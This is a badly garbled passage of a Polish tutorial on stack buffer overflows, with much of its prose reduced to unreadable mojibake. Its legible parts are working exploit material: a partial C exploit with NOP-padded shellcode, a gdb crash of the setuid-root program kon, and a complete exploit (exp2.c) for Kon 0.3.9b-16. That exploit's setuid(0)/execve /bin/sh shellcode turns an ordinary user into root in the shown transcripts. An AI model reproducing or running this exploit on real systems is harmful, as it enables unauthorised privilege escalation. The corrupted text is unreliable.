D&D2H8<POEK816QFG=RS?)FG?513LTUV4

W'1"TXI=OEO(I;YTZ6QF<8[Q:I;B

D&D\6Q,A<56N)+<5[QK8I

*]O^3=_L`

printf("\t[+] Using adres 0x%x\n",ret_addr);

/* przygotowanie do zapisu adresu powrotnego */

buf_addr=buf;

buf_addr2=buf_addr;

/* zapisujemy do buforu podanego jako argument adres powrotny */

while(buf_addr2-buf <= BUFS-5) {

(*(unsigned long*)buf_addr2)=ret_addr;

ab8cdeffLg+hikjkl2mnnop(q&rsZtuoe"vMwMxyzlza8e|{}&w(}Ae"a8~q;x€a5yP}&wZ~&oe{vVb'{‚{'fƒ5y

nnktu„yLpzy(xow8~qpEƒ8etQo"wvS…g|o"w…5efLsbM†ˆ‡Š‰

}

n‹Œy8t}e}ƒZq=oƒ8esMf=yzabZcygbŽ{tQ}…5y}Ago"aƒwVeawpzq&fLoq’‘fLoq&ŒyLƒ“t

q;r”s5y•5xow–‹n

buf_addr2[BUFS-4]='\0';

n‹]oe"…ZqtQb'{"vMwMxe"„&w(ab8c|yLg‚…8yLv—yxƒ8q;x"owVq˜ƒt}gbs8x|{'ev“q5…5yv—y=xƒZq;xowv—q™š”›œ‹n

for(i=0;i<(SHELL);i++)

sh[i]=NOP;

n‹Œya8~&qxoevMw…5y=xo}sVefg+tubzpEa=b8c|yLgo…5yv—y=xƒZq;x"o"wvž‘fLoqv“eaw5

zapisywany shellcode */

buf_addr = sh + ((SHELL)-strlen(shellcode)-1);

n+‹”oe…8qAtb'{'"vw—tQŸ5~&~;xyf=ƒ5efL…ZqtQb'{

 ˆ¡M¢]£k¤

¥–¦§

for(i=0;i<strlen(shellcode);i++)

*(buf_addr++) = shellcode[i];

§¦Œ¨8©ª«ª¬Z­=®¬8«¯z°^±²Z³¨L´|®µ]¶8¨L·—¨ ¬Z­& "®¥·–¸±¥(±¥=¹¨$°­;«º=¨L·—¨»º®­&µP©¼­;½”¯5¨¾5 

zy */

sh[SHELL] = '\0';

printf("\nExecuting the vuln program - %s\n\n",path);

/* uruchamiamy nasz program, a jako argument podajemy nasz bufor */

execl(path,path,buf,0);

return 0;

}

Skompilujemy teraz nasz epxloit i zobaczymy czy

®«ºL®­;«¹«¿8ÀzÁµz¬5«|¼¶Z­;µ´°Ãº=«·X¥Ä©²Z­&º=«º=Á&«(¬8«©u®µ»¨

°$´+«ÅÁ­Æ°(µ»¨z¶´¨=»´+«"·M²kÇ

# chmod +x victim1

$ cc exp1.c -o exp1

$ whoami

user

$ ./exp1

...

# whoami

root

#

ÈÊÉAËzÌ8ÍÎÃÏÐ5Ë=ÑLÒLӘÔË\Õ|ÕÕ֌×|Ø5ÏÐ5ËLΓÓ&ÙÓÚÎMۏÜ5ËLݒԍËLÞ5ß]à5ÍLáÐ5ÍãâÍ"Þ5Ëz×ËËɈÕÕÕ

3. Real

ä

Ü×åLàØ'â'æ"ΏÛçɍæ"×+ÍÒXÒËLà8ÍÏÒÛ5èˆâ'Í

ÞéáÓ;ߏΓÍVáuÜ×+ÍÝz͏ҏÜ=×+Í"Ý$ÑLÒLÓÆÝPÛÎêËLÜ×Ëë×+Í"ΓËÝ$ÍÌ8Ó&æÎÄì=í’ÉAÍ"Þ5ËLÝzÍ"ÌÛÎ

Ü=×+Ëë×ÍΓæÎSà5ßÑÒÓ;æ]Þ5ËLÌ.ì

ä

ÉÍÌ8ÑÍ×ÑËÝ(ËNâæáÉ2ËÌ(Ó0ÌZáQÉAÍÙ&ËÝ(ÍÌÛ$ÝÊÝ(Ó&æÙ0؏ÑÛZáQÉ×Ûà=Ø5Ï|â'ÍÏÐzҁÜ5Í"×+ÍΓæÉ×+æ"ÎîáuØ8Ó&Ñì

ï

ÌZðË×ÎVÍÏâ'ß

Ë

ÑLÒLӘØ×Òæ

Ý

Þ5ËÌ8Ó&æ

Ü5ËÒ"ÛZáQÞ5ÍÙ&ÓÚÎMÛ

Ü=×Òæë=Ù;ñÑÍâñÏ

Ù&ÓáQÉAß

òó5ôõö÷ø

(

http://securityfocus.com/advisories/5434

ùúãû\üýuþÿ8ü&ÿ

ü

ö+÷

&ü

ó

ÿÿ

ö

þÿ5ÿ8ü

ó=öó

!

÷

—ü

÷

"

ö

ôLö+÷

þ#

$

-

%'&()*,+-$.)0/&(214365"78(9:1;*,):<=3>(#?:@+)A1BC+D@2EF<*2GCHJIK&MLN7OP<PQC*-) <R3STOU7V

GW<SRGX1Y7VZ(&STOP9:)QCE[U\(2&]L^*-) &ST_2@-`F)ab*,143dc1BC(OD):<=3

&2(/,&DL[) <Y(#*,)Fc2@,e4&BfO"(21R3g<hSd):ijE):<"kl(#?:@+#&,QTknmDoo-H

p

/2BRq#c2@g36<EUNL[) iY7rOP(2<c2@,+#&DL1Y7r_&*,1ts=9)uSCGX)*+wvxyH

Listing 5. Debugowanie kon’a.

root@localhost:~# gdb kon

GNU gdb 5.0

Copyright 2000 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-slackware-linux"...(no debugging symbols

found)...

(gdb) r -Coding `perl -e 'print "A"x800'`

Starting program: /usr/bin/kon -Coding `perl -e 'print "A"x800'`

Kanji ON Console ver.0.3.9 (2000/04/09)

KON> video type VGA' selected

KON> hardware scroll mode.

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb) info reg eip

eip 0x41414141 0x41414141

(gdb) quit

Voila!

z{1EwUFc<YO/&,QCBR<"(*-) 5|_&#*#GuBC&9:i^*,1Y(~}0€t‚,z{&a"<YE[UF/B=OU-SCGƒ5/,) k|OY*qDLZ(2&/,)WST1*,):1N<„/-9 &)G@KH2€…U2E

BR1OP<E†@2aYUg3g<E[U{3<

STO"7OP<b)**<43‡EF<Gƒ&(DUˆL^U2_&#B=OU-SCGƒ1*,) 1‰c?Wi"(@hG:U/2@]ŠŒ‹[Htz{<GW&(21Gƒ1ŽLU2_,&B=OU-SCG@g3<

LwSC_,1*-)_,),OE.) <**#U7YV~QCBC&2(2&LN)WSC_&LU,7VKH‘^&DGW&LU[LtU+29u5

’“…”g“•–—˜™Kšœ›=ž:ŸW R¡=Ÿ¢£[¤#¥yš

Listing 6. exp2.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <getopt.h>

#define PATH "/usr/bin/kon"

#define BUFS 800

/* ...::: -=[ www.pi3.int.pl ]=- :::... */

char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68\x3a"

"\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20\x5d"

"\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69\x68"

"\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68\x3a\x3a"

"\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04\xcd"

"\x80"

/* setuid(0) */

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"

/* setgid(0) */

"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"

/* exec /bin/sh */

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"

"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"

"\x80"

/* exit(0) */

"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

long ret_ad(char *a1, char *a2) {

return (0xbffffffa-strlen(a1)-strlen(a2));

}

int ussage(char *arg) {

printf("\n\t...::: -=[ exploit for Kon version 0.3.9b-16 (by pi3) ]=- :::...\n");

printf("\n\tUssage:\n\t[+] %s [options]\n

-? <this help screen>

-o <offset>

-p PATH\n\n",arg);

exit(-1);

}

int main(int argc, char *argv[]) {

long ret,*buf_addr;

char *buf,*path=PATH;

static char *sh[]={shellcode,NULL};

int i,opt,offset=0;

FILE *fp;

while((opt = getopt(argc,argv,"p:o:?")) != -1) {

switch(opt) {

case 'o':

offset=atoi(optarg);

break;

case 'p':

path=optarg;

break;

case '?':

default:

ussage(argv[0]);

break;

}

}

if ( (fp=fopen(path,"r"))==NULL) {

printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);

ussage(argv[0]);

} fclose(fp);

if (!(buf=(char*)malloc(BUFS))) {

printf("\nI can\'t locate memory! - buf\n");

exit(-1);

}

printf("\n\t...::: -=[ exploit for Kon version 0.3.9b-16 (by pi3) ]=- :::...\n");

printf("\n\t[+] Bulding buffors!\n");

ret=ret_ad(shellcode,path);

ret+=offset;

printf("\t[+] Using adres 0x%x\n",ret);

buf_addr=(long*)buf;

for(i=0;i<BUFS;i+=4) {

*(buf_addr) = ret; buf_addr++;

}

printf("\nExecuting the vuln program - %s\n\n",path);

execle(path,path,"-Coding", buf, 0, sh);

return 0;

}

¦§¨,©‡ª«,¬=©#­C®0¨2¯W°­X±‰ª²"³´Pµu¶·,©2³§¸2±¹g§Y¨©§­CºD«2»¶¸2¯N³¼ §8½­R§Y¾P¼:µ¿½|¶Pº#©{·2­R©ºD­R§Y»w«-®tÀR¯X§­R§4¹;Àdµ:²8ª#±{ª2±2Á^©#¸

½[µ ¶"¼u©¨­R©D¯u¸,©ÂyÃ"µ Ä8ōƽµ:¶"¼¿¨©ÂyÇÀÈÁW©D½N§ÉwµA³©2³§=¹.³©¸,µ:¶"º#©F¹6¶Y³2¶Y¸Êª§4¹y¯X®Ë¨2¯W°­X±‡ª,²Y³#´Dµ ¶Ì´P§·,µWÀT§Y¸#±Ê´Y¸,§¨-µ ¶»

NULL ('\

ÍÎ

ÉyÏPÐK­=´"¶¯X¶PÀC¯«g¹d»[±[½µ ²"̸,§PÀT´"¶Yº#©¨©#¸§2Ñ

$ whoami

user

$ ls –alh /usr/bin/kon

-rwsr-xr-x 1 root root 45k Jul 5 20:57 /usr/bin/kon*

$ cc exp2.c -o exp2

$ ./exp2

...

KON> video type VGA' selected

KON> hardware scroll mode.

...::: -=[

www.pi3.int.pl

]=- :::…

# whoami

root

#

ÒNÓÔ:Õ:ÖØ×ÙÚÖYÛ#ÜPÔ:ÖÝÖÝWÓ]ÞFÖÞßáàCÓ2ÓDâ=ãCäåDÕ:Õ Öæ×=×=×çgÖèné[Ô Û2ÖPêbÞ~åâƒÓ2ÛÖlÖâWÖè,ÓDéÖë-Ô:ÖíìàRÓ2îàRÖÞ~ï]Ülì2à=Üßè2ÝÖPÛïZÖ

ìàRÖéÛÜPÔ¿é|åPî#Óì2àCÓ2îDàRÖÞ~ïãCï,ÔuÛ2Óé|åPî#Óë,Ô ðYÜß2ÞãyÔ ñNë,Ô å|àCòóë-ÔÈ×-ô…à=ÜPåõ,֏âuß,Õè,ÓÜYë,Ö"Õ åöPêNÓ2Û#ìÓéÔ åPÛë-Ô ÷|ÓøRÔ:ÖàCñ"ù

è2âWòàRÖÞ~Öï-ãCâWÖéÔ:Ó#ë#ß>ÖâWàXß2õï2ëÖâÚãÈï-Ô Û2Öúôûà=ÜPåõÖýügåYÛ#ëÖYèFï-þ4é[Ô ÖPÛ2Ó#ÞFÔ ê|éNÖÞFùÿÔóNë,Ô:å^é

ãTÜß-ãÈâuè,Ô:åÛÜPÔ¿ï2àXß>ÛÖ=üg÷

ÛÓãÈâWñìwõ#ßõåÜYì,ÓþRàÈåYÛë-Ô ÓNÜYÞFÔuåë,Ô:êôËù2Ó#àRÖÜtë,Ô åŒéãTÜß-ãÈâuè,ÔuårÛÜÔï2àXßãT÷ŒÞFÓóÕ:ÔéåtÛÓ^éßèÓà4Üß-ãÈâWÖë-Ô:Ö

(exploitowania).

Ó~Û2ÓwâWå4üAÞ~åâƒÓ2Ûß,ùè2âƒòàC÷tïóß,ÕuÔuþCÞwß~éhâ:ß2Þ

ìà=Üß2èÝÖ"Û#ÜPÔ åDùâƒÓwàRò#óë,Ô

ãdÔ:ñ|Óë,֏âuàRÓãTÜè,ñNÓ2Û[ìÓìà=Ü"åPÛë-Ô å=üù,î#ÛDßó

ë-Ô åïóß#éÖ"Õ:ÔWþRÞßÌé|ðPÖ"Õ åÔ ë-ãRâWà=ï2è,ð=ü

ԇÔ

âàCÖ"ø4ÔuÕuÔuþÈÞ[ßé

ìÓ#ì2àRÖé^ë2ß;Ö"ÛàRåDãtÜ"Öwì,Ô:åàXéwãCÜßÞ

àRÖÜDåÞÌúæôÓ^ü6åDãCâ

é|ÝÖPþÈë,Ô å>ÜDÖ"Õ åâW÷Ìî#ÛDßMï2ÞÔ åþÈð"Ô Þ[ߎãCä,åPÕuÕ ð"ÓÛ2åé

ÜYÞÔ:åë2ë2ßðYäÊþCàCÓ2Û2ÓéÔãÈè,ÓDétß-ðäÿúóßÝåÞ

àRòéë-Ô:åó;Ôë2ë,å"î2Ó

ãTäåPÕ:Õ:ð"Ó2Ûï-ùÚÖ"ÕuåàRÓ#õ,Ô

ÓëâXÓãdÖÞÓ8ðPÓ;ì,Óìà=ÜPå"Ûë,Ô:åÜFâuß2Þ

ÜPÖDãCâà=Ü"åóPåë,Ô åYÞFùÚÔ ó>Û2ÓÛ2ÖÝWåÞ

éãTäåPÕ:Õ:ð"Ó2ÛÜDÔ:åFõ2ß

é^ß-þ4é[Ô åâƒÕ Ö

݅Ó#ëÕuÔë2è.ÛÓ[ÞFÓyüå=ütãÈâuàRÓ#ë#ßÈú¿ú ú

-=[

www.pi3.int.pl

]=-

:ú úúCù-ÓàRÖYÜ^ëÖ[ãTÖYÞ\èÓ#ë,ÔuåYð|Û2ÓÛ2ÖYÝåÞ

ÔëØãCâà=ï2è,ð4ü6ñFå-Ô¿âƒù

è2âƒò#àRÖ.ãyÔuñwéß2è,Óë,ÖFî#ÛDß2õ2ß8ðYÓþrõ2ß2ÝÓ>ë,ÔuåâƒÖèÌÜ>ãCäåDÕ:Õ ðPÓ2ÛåÞ

np

ú,âWàRÖ"øRÔ:ÕuÔ¿õ#ß-þÈÞ[ßé

þRàRÓÛ2åYè

ë-Ô å"î2ÓûÔé^ß2èÓ#ë#ß#éNÖÝWÓõ#ßãyÔ ñrë

ie to co powinno –

âƒÖè,Ô årÞ~ÖYÝåŒÜPÖõåYÜì-Ô å"ðÜ"åYë,Ô å2ú

=DNR F]HQLH

"!$#%'&()#*,+.- / 0%21-+32%&%5467896;:<$#>=?! '@AA8:BA!9#>C/(:4D"+B:<%E1/F$/,&(G"+;H&(IJ/(4D%21/D-+;/,1)+7A=CK#91&(8

2/L E@AA8=8M2%5NO"$EP-$Q:R0C!$#%C=SS0/1,#@""! %21,/T/,1+;A!9#@A)%A!$#K- /&,@AE)6$/(-$#/)4UA!$#V@A)%1/$P&/WL,9X3/(+Y$Z

oznac

2[:</ Z\#>]^:R_XR!, @YNO[=S/(]2%^L,8 `M4F+;"])0#a4Ucb

np

d

1&)8e/,1)+;!$#@AE%"!$#%[- QA:B0#fNg%)67:U0#@"L ["! " H(44

h"i;j)k,lSm"n o2pm_hqn$pm^rUpm2s*t u vxwqy,k9z3u(iYk{x|

P

u(} hA~Ji3l€en hq‚((p>k,i;ƒ[r„r'k(…†zR~J} ‚‡‚,m2h"lVu(n9pmcˆ<} m"‰n$m^hE‚(Š pJ‹xuiB€

lVu(Œ2n h52n h2sm"2w\} u‚Uh2‚i;mE‹xm"l

http://www.securityfocus.com/archive/1/338436

):

int SockPrintf(FILE *sockfp, char *format,...)

{

va_list ap;

char buf[32768];

va_start(ap, format);

vsprintf(buf, format, ap);

va_end(ap);

return SockWrite(buf, 1, strlen(buf), sockfp);

}

Ž

Ep>ki;hArDhzBk,n,t$o3Oh’‘ uoAt,“”i7p>n,~Om)‹7~‚ sh~Bmju •p>ŒekŒ"€rDh–zRk,nt o;OpŠ$‹—},i7p*n~Bz˜t,~R™(i7h‡n$pm‹š},i;h"rF‚Eh›oEpœ2j(k

h"i;j)k,lSm"n~<™(r},iYEmAoužOmE‹š~†lVu(ŒEsJparDm},i3)mA} m"‰n9pmAn9pm5yk$z3ui;h|ŸCpm(‹;~RmA~€Ch"t,k,i7h~ r~€,l¡},i3€,} h2‚(t,kU~<h\‚()p>k,išh

n9pmfOm)‹7~†lKuŒ)sp>rDh'‚,ur€,t ui3A€9‹š~<hn$ph,|E“urpƒEom35p>n$zYu(i3lVhEo3Op u,‚ ‹š€,‰Jh"l¢‚u

} m"‰n$mjuUhE‚(Š$p‹xuiB€”|

Ž

k,Œ2uct u(lVmAi7oA€g£n m2jucu(}i;u,j)i7hAlSu)rDh"n9phWt ui3A€9‹š~<hWW~<mEoA¤,n$usuj,pp

Open Source. Niektóre bugi jednak

lVu,jœVy€ wCy$hAi;‚Eu},i;u$‹7~Rur'€,tiB€~<mV} u(}i32m"VAr'€t,‰JmC}i3EmA~<mE‹š~<u)rUhAn9pmCKy h"i;‚()uM‚(‰k$j,p>l} hAi7hAlSm~i7m"l¥‚u

t$hAŒE‚m3‚,u ‹7~Rƒ"},n mY¦u} o3p },i7u,j)i;hlCk”|(§‚(€kg£i3"€,l€"n$hAn$mn h"l¨‘$m

gmentation fault zdebugujcie program

i napiszcie exploita ;).

©

n$zYu(i3lVho;gm

u

n$h3£n u)r‹—A€ oA¤

u,‚t,iB€,~€ o¤

y,k$jho¤

‹xœ

‚u ‹š~<ƒA}n m

n h

spvxo2pm

y,k j)~i7h2ª

(

http://securityfocus.com/archive/1

«x¬C­F®A¯2°(±³² ®µ´R¶¸·¹Jº7´R¶µ»S¼(¯E½¡º£¹¶’¾

®A¿9¹Jºx®2À,¬CÁ¼)´<¼(ÂD½Ã½"Ä¿9·¼¹>´±ÅºxÆ

Ç;È

²9¹½A¯D²$®´R½3É·¹Ê—ËE¹½'¾2®»V¹½(º7¾)ËA¾2®² ½EÌ ®E·½'´<¼K¼ÂD¹½2·½

Ç

¾E®°(¾(¹½3ÉE¬2Í®3É"ÊY¹½"¯(ºš¾2½F½"Ä¿9·¼¹a´J±C»V¼(¯2² ®'¾²$®2·½Î2À²$®

stronie packetstorm (

http://www.packetstormsecurity.nl

).

5. Bibliografia

http://phrack.org/show.php?p=49&a=14

http://www.pi3.int.pl